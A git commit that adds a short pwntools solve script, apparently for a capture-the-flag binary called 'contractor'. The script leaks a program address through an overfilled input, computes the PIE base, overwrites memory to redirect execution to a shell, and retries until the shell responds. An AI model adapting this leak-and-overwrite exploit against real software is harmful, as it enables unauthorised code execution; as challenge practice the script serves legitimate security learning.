solve script

2025-03-27 23:58:07 +03:00
parent 4ea52ad817
commit b98813ca8a
1 changed files with 36 additions and 0 deletions
@@ -0,0 +1,36 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./contractor", checksec=False)
+
+while True:
+	r = process()
+
+	# funcs
+	s = lambda a,b: r.sendafter(a, b)
+	sl = lambda a,b: r.sendlineafter(a, b)
+	fill = lambda a: [sl(b"> ", i) if b"\n" in a else s(b"> ", i) for i in a]
+	opt = lambda a,b: (sl(b"> ", a), sl(b": ", b))
+
+	# leak
+	fill([b"mug3njutsu\n", b"none\n", b"13\n", b"ofcourse"+b"C"*8])
+	r.recvuntil(b"C"*8)
+	target.address = u64(r.recv(6).ljust(8, b"\x00")) - 0x1b50
+	log.info("pie: %#x", target.address)
+
+	# write
+	opt(b"4", b"A"*28+p32(0)+b"\x40")
+	sl(b"> ", b"no")
+	opt(b"4", p64(target.sym.contract))
+	
+	r.recvuntil(b"lad!\n\n")
+
+	try:
+		r.sendline(b"id")
+		if r.recvline():
+			break
+	except EOFError:
+		pass
+
+r.interactive()